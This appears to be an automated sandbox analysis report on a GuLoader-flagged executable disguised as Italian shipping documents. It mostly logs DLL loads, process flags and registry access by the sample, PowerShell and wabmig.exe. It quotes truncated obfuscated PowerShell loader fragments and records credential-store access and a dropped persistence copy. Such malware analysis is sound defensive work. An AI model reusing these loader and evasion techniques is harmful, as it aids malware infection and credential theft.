Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wabmig.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: Documenti di spedizione 0009333000459595995.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: jqm.Core.pdb source: powershell.exe, 00000001.00000002.2389766114.00000000070C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2389766114.00000000070C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbPCp source: powershell.exe, 00000001.00000002.2393965982.00000000081B8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbLC source: powershell.exe, 00000001.00000002.2393965982.00000000081B8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2389766114.00000000070C4000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.2394657139.0000000008C11000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Carboxylase $Libyerne $Prisere), (Harminic @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Xerotherm = [AppDomain]::CurrentDomain.GetAssemblies()$global:Ch
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($efterkrigsaarene)), $hjernekiste).DefineDynamicModule($Sexsymboler, $false).DefineType($Chorale, $Trosbekendelserne, [System.Multicast

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00C1E244 pushfd ; iretd	1_2_00C1E24D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00C1CB88 push C807F088h; ret	1_2_00C1CB8D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0712E174 push 84E80835h; iretd	1_2_0712E179
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0712EDA8 push edx; ret	1_2_0712EDAB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0712AB0B push dword ptr [ebp+ebx-75h]; iretd	1_2_0712AB11
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08B22680 push 00000071h; retf	1_2_08B22684
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08B22272 push edi; retf	1_2_08B22273
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08B21055 push esi; ret	1_2_08B2105A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08B20846 pushad ; iretd	1_2_08B2084D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08B23045 push ecx; ret	1_2_08B23046
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08B24596 push ds; iretd	1_2_08B24598
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08B22F80 push ebx; ret	1_2_08B22F8E
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_03C62F80 push ebx; ret	6_2_03C62F8E
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_03C64596 push ds; iretd	6_2_03C64598
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_03C62680 push 00000071h; retf	6_2_03C62684
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_03C60846 pushad ; iretd	6_2_03C6084D
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_03C63045 push ecx; ret	6_2_03C63046
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_03C61055 push esi; ret	6_2_03C6105A
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_03C62272 push edi; retf	6_2_03C62273
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Code function: 6_2_26933FC8 push 2426A3DAh; retf	6_2_26933FD5

Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	File created: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\acneform\Documenti di spedizione 0009333000459595995.exe			Jump to dropped file

Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
